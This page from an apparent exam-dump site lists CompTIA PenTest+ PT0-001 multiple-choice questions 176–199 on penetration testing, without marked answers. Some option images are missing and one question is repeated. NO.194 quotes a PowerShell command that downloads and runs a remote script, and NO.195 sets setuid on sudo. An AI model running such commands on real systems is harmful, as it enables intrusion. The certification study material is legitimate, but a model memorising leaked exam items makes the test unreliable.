CompTIA PT0-001 Premium Exam Engine pdf - Download Free Updated 295 Questions [Q176-Q199] : Actual Test Materials : http://blog.actualtests4sure.com

NO.176 A penetration tester has performed a security assessment for a startup firm. The report lists a total of ten vulnerabilities, with five identified as critical. The client does not have the resources to immediately remediate all vulnerabilities. Under such circumstances, which of the following would be the BEST suggestion for the client?

Apply easy compensating controls for critical vulnerabilities to minimize the risk, and then reprioritize remediation.

Identify the issues that can be remediated most quickly and address them first.

Implement the least impactful of the critical vulnerabilities’ remediations first, and then address other critical vulnerabilities

Fix the most critical vulnerability first, even if it means fixing the other vulnerabilities may take a very long lime.

NO.177 During an engagement, a consultant identifies a number of areas that need further investigation and require an extension of the engagement.
Which of the following is the MOST likely reason why the engagement may not be able to continue?

The consultant did not sign an NDA.

The consultant was not provided with the appropriate testing tools.

The company did not properly scope the project.

The initial findings were not communicated to senior leadership.

NO.178 A penetration tester successfully exploits a Windows host and dumps the hashes Which of the following hashes can the penetration tester use to perform a pass-the-hash attack?
A)

B)

C)

D)

Option A

Option B

Option C

Option D

NO.179 A penetration tester has a full shell to a domain controller and wants to discover any user account that has not authenticated to the domain in 21 days. Which of the following commands would BEST accomplish this?

dsrm -users “DN=company.com; OU=hq CN=users”

dsuser -name -account -limit 3

dsquery user -inactive 3

dsquery -o -rdn -limit 21

NO.180 A file contains several hashes. Which of the following can be used in a pass-the-hash attack?

NTLMv2

Kerberos

NTLMv1

LMv2

NTLM

NO.181 A company requested a penetration tester review the security of an in-house developed Android application. The penetration tester received an APK file to support the assessment. The penetration tester wants to run SAST on the APK file. Which of the following preparatory steps must the penetration tester do FIRST? (Select TWO).

Convert to JAR.

Decompile.

Cross-compile the application.

Convert JAR files to DEX.

Re-sign the APK.

Attach to ADB.

NO.182 Black box penetration testing strategy provides the tester with:

a target list

a network diagram

source code

privileged credentials

NO.183 An attacker uses SET to make a copy of a company’s cloud-hosted web mail portal and sends an email in hopes the Chief Executive Officer (CEO) logs in to obtain the CEO’s login credentials.

Elicitation attack

Impersonation attack

Spear phishing attack

Drive-by download attack

NO.184 Which of the following situations would cause a penetration tester to communicate with a system owner/client during the course of a test? (Select TWO)

The tester discovers personally identifiable data on the system

The system shows evidence of prior unauthorized compromise

The system shows a lack of hardening throughout

The system becomes unavailable following an attempted exploit

The tester discovers a finding on an out-of-scope system

NO.185 A penetration tester is in the process of writing a report that outlines the overall level of risk to operations.
In which of the following areas of the report should the penetration tester put this?

Appendices

Executive summary

Technical summary

Main body

NO.186 Which of the following BEST describes why an MSA is helpful?

It contractually binds both parties to not disclose vulnerabilities.

It reduces potential for scope creep.

It clarifies the business arrangement by agreeing to specific terms.

It defines the timelines for the penetration test.

NO.187 A vulnerability scan report shows what appears to be evidence of a memory disclosure vulnerability on one of the target hosts. The administrator claims the system is patched and the evidence is a false positive. Which of the following is the BEST method for a tester to confirm the vulnerability exists?

Manually run publicly available exploit code.

Confirm via evidence of the updated version number.

Run the vulnerability scanner again.

Perform dynamic analysis on the vulnerable service.

NO.188 Which of the following BEST protects against a rainbow table attack?

Increased password complexity

Symmetric encryption

Cryptographic salting

Hardened OS configurations

NO.189 A penetration tester executed a vulnerability scan against a publicly accessible host and found a web server that is vulnerable to the DROWN attack. Assuming this web server is using the IP address 127.212.31.17, which of the following should the tester use to verify a false positive?

Openssl s_client -tls1_2 -connect 127.212.31.17:443

Openssl s_client -ss12 -connect 127.212.31.17:443

Openssl s_client -ss13 -connect 127.212.31.17:443

Openssl s_server -tls1_2 -connect 127.212.31.17:443

NO.190 A penetration tester wants to check manually if a “ghost” vulnerability exists in a system. Which of the following methods is the correct way to validate the vulnerability?
A)

B)

C)

D)

Option A

Option B

Option C

Option D

NO.191 After establishing a shell on a target system, Joe, a penetration tester is aware that his actions have not been detected. He now wants to maintain persistent access to the machine. Which of the following methods would be MOST easily detected?

Run a zero-day exploit.

Create a new domain user with a known password.

Modify a known boot time service to instantiate a call back.

Obtain cleartext credentials of the compromised user.

NO.192 Which of the following exploits a vulnerability associated with IoT devices?

Blue snarfing

Simple certificate enrollment

Heartbleed

Mirai botnet

NO.193 During an engagement, a consultant identifies a number of areas that need further investigation and require an extension of the engagement. Which of the following is the MOST likely reason why the engagement may not be able to continue?

The consultant did not sign an NDA.

The consultant was not provided with the appropriate testing tools.

The company did not properly scope the project.

The initial findings were not communicated to senior leadership.

NO.194 Consider the following PowerShell command:
powershell.exe IEX (New-Object Net.Webclient).downloadstring(http://site/ script.ps1″);Invoke-Cmdlet Which of the following BEST describes the actions performed this command?

Set the execution policy

Execute a remote script

Run an encoded command

Instantiate an object

NO.195 The following command is run on a Linux file system:
Chmod 4111 /usr/bin/sudo
Which of the following issues may be exploited now?

Kernel vulnerabilities

Sticky bits

Unquoted service path

Misconfigured sudo

NO.196 A consultant wants to scan all the TCP ports on an identified device. Which of the following Nmap switches will complete this task?

-p-

-p ALL

-p 1-65534

-port 1-65534

NO.197 A company planned for and secured the budget to hire a consultant to perform a web application penetration test. Upon discovered vulnerabilities, the company asked the consultant to perform the following tasks:
* Code review
* Updates to firewall setting

Scope creep

Post-mortem review

Risk acceptance

Threat prevention

NO.198 A security team is switching firewall vendors. The director of security wants to scope a penetration test to satisfy requirements to perform the test after major architectural changes.
Which of the following is the BEST way to approach the project?

Design a penetration test approach, focusing on publicly released firewall DoS vulnerabilities.

Review the firewall configuration, followed by a targeted attack by a read team.

Perform a discovery scan to identify changes in the network.

Focus on an objective-based approach to assess network assets with a red team.

NO.199 A security consultant is trying to attack a device with a previously identified user account.

Which of the following types of attacks is being executed?

Credential dump attack

DLL injection attack

Reverse shell attack

Pass the hash attack